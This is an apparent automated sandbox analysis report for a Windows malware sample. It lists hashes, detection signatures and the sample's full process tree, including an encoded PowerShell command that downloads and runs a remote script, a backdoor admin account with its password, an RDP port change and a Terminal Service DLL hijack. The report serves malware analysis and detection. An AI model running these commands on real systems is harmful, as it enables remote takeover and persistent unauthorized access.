Analysis
- max time kernel: 129s
- max time network: 118s
- platform: windows7_x64
- resource: win7v20201028
- submitted: 08-11-2020 17:43
Static task: static1
Behavioral task: behavioral1
- Sample: 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
- Resource: win10v20201028
General
- Target: 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
- Size: 3.4MB
- MD5: af944f00c218cc525ef7e56f5d634cdf
- SHA1: 532a7870f610b86ef3c1eb3f10b60a9da6152bcb
- SHA256: 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2
- SHA512: 62b68e3651ae7a0222bc3a16442994b9c6d6505965e7b081bac168659b6eb97bbbb0cc5db260e65f4185017de62a5dc16c37347e447467db75ae062022533014
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blacklisted process makes network request (10 IoCs)
  Processes (flow, pid, process):
  6 1544 powershell.exe
  8 1544 powershell.exe
  10 1544 powershell.exe
  11 1544 powershell.exe
  13 1544 powershell.exe
  15 1544 powershell.exe
  17 1544 powershell.exe
  19 1544 powershell.exe
  21 1544 powershell.exe
  23 1544 powershell.exe
- Modifies RDP port number used by Windows (1 TTP)
- Possible privilege escalation attempt (8 IoCs)
  Processes (pid, process):
  1608 icacls.exe
  1544 icacls.exe
  1564 icacls.exe
  1816 takeown.exe
  1636 icacls.exe
  752 icacls.exe
  1688 icacls.exe
  1720 icacls.exe
- Sets DLL path for service in the registry (2 TTPs)
- YARA rule matches (resource, yara_rule):
  \Windows\Branding\mediasrv.png upx
  \Windows\Branding\mediasvc.png upx
- Deletes itself (1 IoC)
  Processes (pid, process):
  1436 powershell.exe
- Loads dropped DLL (2 IoCs)
  Processes (pid, process):
  1816 (no process name recorded)
  1816 (no process name recorded)
- Modifies file permissions (1 TTP, 8 IoCs)
  Processes (pid, process):
  1608 icacls.exe
  1544 icacls.exe
  1564 icacls.exe
  1816 takeown.exe
  1636 icacls.exe
  752 icacls.exe
  1688 icacls.exe
  1720 icacls.exe
- Drops file in System32 directory (1 IoC)
  Processes (description, ioc, process):
  File created C:\Windows\system32\rfxvmt.dll powershell.exe
- Modifies service (2 TTPs, 2 IoCs)
  Processes (description, ioc, process):
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe
  Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe
- Drops file in Windows directory (41 IoCs)
  Processes: powershell.exe
- Modifies data under HKEY_USERS (60 IoCs)
  Processes: powershell.exe, WMIC.exe
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes (description, flow, ioc):
  HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header 13 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  Processes (pid, process):
  1436 powershell.exe
  1436 powershell.exe
  1436 powershell.exe
  1436 powershell.exe
  1436 powershell.exe
  1544 powershell.exe
  1544 powershell.exe
- Suspicious behavior: LoadsDriver (5 IoCs)
  Processes (pid): 472, 1816, 1816, 1816, 1816
- Suspicious use of AdjustPrivilegeToken (15 IoCs)
  Processes (description, pid, process):
  Token: SeDebugPrivilege 1436 powershell.exe
  Token: SeRestorePrivilege 752 icacls.exe
  Token: SeAssignPrimaryTokenPrivilege 808 WMIC.exe
  Token: SeIncreaseQuotaPrivilege 808 WMIC.exe
  Token: SeAuditPrivilege 808 WMIC.exe
  Token: SeAssignPrimaryTokenPrivilege 808 WMIC.exe
  Token: SeIncreaseQuotaPrivilege 808 WMIC.exe
  Token: SeAuditPrivilege 808 WMIC.exe
  Token: SeAssignPrimaryTokenPrivilege 872 WMIC.exe
  Token: SeIncreaseQuotaPrivilege 872 WMIC.exe
  Token: SeAuditPrivilege 872 WMIC.exe
  Token: SeAssignPrimaryTokenPrivilege 872 WMIC.exe
  Token: SeIncreaseQuotaPrivilege 872 WMIC.exe
  Token: SeAuditPrivilege 872 WMIC.exe
  Token: SeDebugPrivilege 1544 powershell.exe
- Suspicious use of WriteProcessMemory (127 IoCs)
  Processes: 1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe, powershell.exe, csc.exe, net.exe, cmd.exe
Processes (child processes indented under their parent)
- C:\Users\Admin\AppData\Local\Temp\1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe
  command: "C:\Users\Admin\AppData\Local\Temp\1ac9d42a596c55757b4f37e6291887149a6070bfedb4e27a86cf3cff4d76f2a2.exe"
  signatures: Suspicious use of WriteProcessMemory
  - \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
    command: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
    signatures: Deletes itself; Drops file in System32 directory; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\15t4uk3p\15t4uk3p.cmdline"
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2CEA.tmp" "c:\Users\Admin\AppData\Local\Temp\15t4uk3p\CSCCD8AE2460FA4BD7A52E6D591908521.TMP"
    - C:\Windows\system32\takeown.exe
      command: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
      signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      command: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
      signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      command: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
      signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe
      command: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
      signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      command: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
      signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      command: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
      signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      command: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
      signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      command: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
      signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\reg.exe
      command: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe
      command: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      signatures: Modifies service; Modifies registry key
    - C:\Windows\system32\reg.exe
      command: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe
      command: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe
        command: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe
      command: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        command: cmd /c net start rdpdr
        signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe
          command: net start rdpdr
          signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe
            command: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe
      command: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - C:\Windows\system32\cmd.exe
        command: cmd /c net start TermService
        - C:\Windows\system32\net.exe
          command: net start TermService
          - C:\Windows\system32\net1.exe
            command: C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe
      command: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe
      command: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe
  command: cmd /C net.exe user updwin Ghasar4f5 /del
  - C:\Windows\system32\net.exe
    command: net.exe user updwin Ghasar4f5 /del
    - C:\Windows\system32\net1.exe
      command: C:\Windows\system32\net1 user updwin Ghasar4f5 /del
- C:\Windows\System32\cmd.exe
  command: cmd /C net.exe user updwin 929YDPPD /add
  - C:\Windows\system32\net.exe
    command: net.exe user updwin 929YDPPD /add
    - C:\Windows\system32\net1.exe
      command: C:\Windows\system32\net1 user updwin 929YDPPD /add
- C:\Windows\System32\cmd.exe
  command: cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
  - C:\Windows\system32\net.exe
    command: net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
    - C:\Windows\system32\net1.exe
      command: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
- C:\Windows\System32\cmd.exe
  command: cmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
  - C:\Windows\system32\net.exe
    command: net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
    - C:\Windows\system32\net1.exe
      command: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
- C:\Windows\System32\cmd.exe
  command: cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
  - C:\Windows\system32\net.exe
    command: net.exe LOCALGROUP "Administrators" updwin /ADD
    - C:\Windows\system32\net1.exe
      command: C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
- C:\Windows\System32\cmd.exe
  command: cmd /C net.exe user updwin 929YDPPD
  - C:\Windows\system32\net.exe
    command: net.exe user updwin 929YDPPD
    - C:\Windows\system32\net1.exe
      command: C:\Windows\system32\net1 user updwin 929YDPPD
- C:\Windows\System32\cmd.exe
  command: cmd.exe /C wmic path win32_VideoController get name
  - C:\Windows\System32\Wbem\WMIC.exe
    command: wmic path win32_VideoController get name
    signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\cmd.exe
  command: cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe
    command: wmic CPU get NAME
    signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\cmd.exe
  command: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe
    command: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      decoded -enc argument (UTF-16LE base64): IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), which matches the URL in Malware Config above
      signatures: Blacklisted process makes network request; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Downloads (files captured during the run)
- C:\Users\Admin\AppData\Local\Temp\15t4uk3p\15t4uk3p.dll
- C:\Users\Admin\AppData\Local\Temp\RES2CEA.tmp
- C:\Users\Admin\AppData\Local\Temp\get-points.ps1
- C:\Users\Admin\AppData\Local\Temp\get-points.zip
- C:\Windows\system32\rfxvmt.dll
- \??\PIPE\lsarpc
- \??\PIPE\samr
- \??\PIPE\samr
- \??\c:\Users\Admin\AppData\Local\Temp\15t4uk3p\15t4uk3p.0.cs
- \??\c:\Users\Admin\AppData\Local\Temp\15t4uk3p\15t4uk3p.cmdline
- \??\c:\Users\Admin\AppData\Local\Temp\15t4uk3p\CSCCD8AE2460FA4BD7A52E6D591908521.TMP
- \Windows\Branding\mediasrv.png
- \Windows\Branding\mediasvc.png
-
memory/288-56-0x0000000000000000-mapping.dmp
-
memory/340-69-0x0000000000000000-mapping.dmp
-
memory/400-66-0x0000000000000000-mapping.dmp
-
memory/400-13-0x0000000000000000-mapping.dmp
-
memory/560-57-0x0000000000000000-mapping.dmp
-
memory/564-65-0x0000000000000000-mapping.dmp
-
memory/636-53-0x0000000000000000-mapping.dmp
-
memory/688-52-0x0000000000000000-mapping.dmp
-
memory/748-54-0x0000000000000000-mapping.dmp
-
memory/752-40-0x0000000000000000-mapping.dmp
-
memory/808-76-0x0000000000000000-mapping.dmp
-
memory/872-47-0x0000000000000000-mapping.dmp
-
memory/872-77-0x0000000000000000-mapping.dmp
-
memory/900-46-0x0000000000000000-mapping.dmp
-
memory/1020-63-0x0000000000000000-mapping.dmp
-
memory/1032-0-0x00000000010C0000-0x00000000013FD000-memory.dmp
Filesize 3.2MB
-
memory/1032-62-0x0000000000000000-mapping.dmp
-
memory/1032-1-0x0000000001400000-0x0000000001411000-memory.dmp
Filesize 68KB
-
memory/1052-10-0x0000000000000000-mapping.dmp
-
memory/1052-49-0x0000000000000000-mapping.dmp
-
memory/1136-55-0x0000000000000000-mapping.dmp
-
memory/1184-50-0x0000000000000000-mapping.dmp
-
memory/1184-87-0x0000000000000000-mapping.dmp
-
memory/1212-70-0x0000000000000000-mapping.dmp
-
memory/1216-58-0x0000000000000000-mapping.dmp
-
memory/1316-64-0x0000000000000000-mapping.dmp
-
memory/1316-73-0x0000000000000000-mapping.dmp
-
memory/1328-48-0x0000000000000000-mapping.dmp
-
memory/1436-33-0x0000000002300000-0x0000000002301000-memory.dmp
Filesize 4KB
-
memory/1436-7-0x00000000024E0000-0x00000000024E1000-memory.dmp
Filesize 4KB
-
memory/1436-3-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmp
Filesize 9.9MB
-
memory/1436-4-0x0000000002350000-0x0000000002351000-memory.dmp
Filesize 4KB
-
memory/1436-5-0x000000001AC10000-0x000000001AC11000-memory.dmp
Filesize 4KB
-
memory/1436-6-0x00000000023B0000-0x00000000023B1000-memory.dmp
Filesize 4KB
-
memory/1436-2-0x0000000000000000-mapping.dmp
-
memory/1436-9-0x000000001C130000-0x000000001C131000-memory.dmp
Filesize 4KB
-
memory/1436-17-0x00000000023A0000-0x00000000023A1000-memory.dmp
Filesize 4KB
-
memory/1436-38-0x00000000022D0000-0x00000000022E0000-memory.dmp
Filesize 64KB
-
memory/1436-18-0x00000000028E0000-0x00000000028E1000-memory.dmp
Filesize 4KB
-
memory/1436-35-0x000000001B6E0000-0x000000001B6E1000-memory.dmp
Filesize 4KB
-
memory/1436-34-0x0000000002310000-0x0000000002311000-memory.dmp
Filesize 4KB
-
memory/1436-21-0x000000001B5C0000-0x000000001B5C1000-memory.dmp
Filesize 4KB
memory/1468-61-0x0000000000000000-mapping.dmp
-
memory/1544-95-0x00000000012B0000-0x00000000012B1000-memory.dmp
Filesize 4KB
-
memory/1544-99-0x0000000019490000-0x0000000019491000-memory.dmp
Filesize 4KB
-
memory/1544-97-0x0000000019460000-0x0000000019461000-memory.dmp
Filesize 4KB
-
memory/1544-96-0x0000000019450000-0x0000000019451000-memory.dmp
Filesize 4KB
-
memory/1544-106-0x0000000019480000-0x0000000019481000-memory.dmp
Filesize 4KB
-
memory/1544-98-0x0000000019480000-0x0000000019481000-memory.dmp
Filesize 4KB
-
memory/1544-107-0x000000001A1B0000-0x000000001A1B1000-memory.dmp
Filesize 4KB
-
memory/1544-114-0x00000000195D0000-0x00000000195D1000-memory.dmp
Filesize 4KB
-
memory/1544-44-0x0000000000000000-mapping.dmp
-
memory/1544-90-0x0000000001260000-0x0000000001261000-memory.dmp
Filesize 4KB
-
memory/1544-79-0x0000000000000000-mapping.dmp
-
memory/1544-80-0x000007FEF5520000-0x000007FEF5F0C000-memory.dmp
Filesize 9.9MB
-
memory/1544-115-0x000000001AC60000-0x000000001AC61000-memory.dmp
Filesize 4KB
-
memory/1556-85-0x0000000000000000-mapping.dmp
-
memory/1564-45-0x0000000000000000-mapping.dmp
-
memory/1608-43-0x0000000000000000-mapping.dmp
-
memory/1636-39-0x0000000000000000-mapping.dmp
-
memory/1684-74-0x0000000000000000-mapping.dmp
-
memory/1688-71-0x0000000000000000-mapping.dmp
-
memory/1688-41-0x0000000000000000-mapping.dmp
-
memory/1720-42-0x0000000000000000-mapping.dmp
-
memory/1736-72-0x0000000000000000-mapping.dmp
-
memory/1816-36-0x0000000000000000-mapping.dmp
-
memory/2016-78-0x0000000000000000-mapping.dmp
-
memory/2040-51-0x0000000000000000-mapping.dmp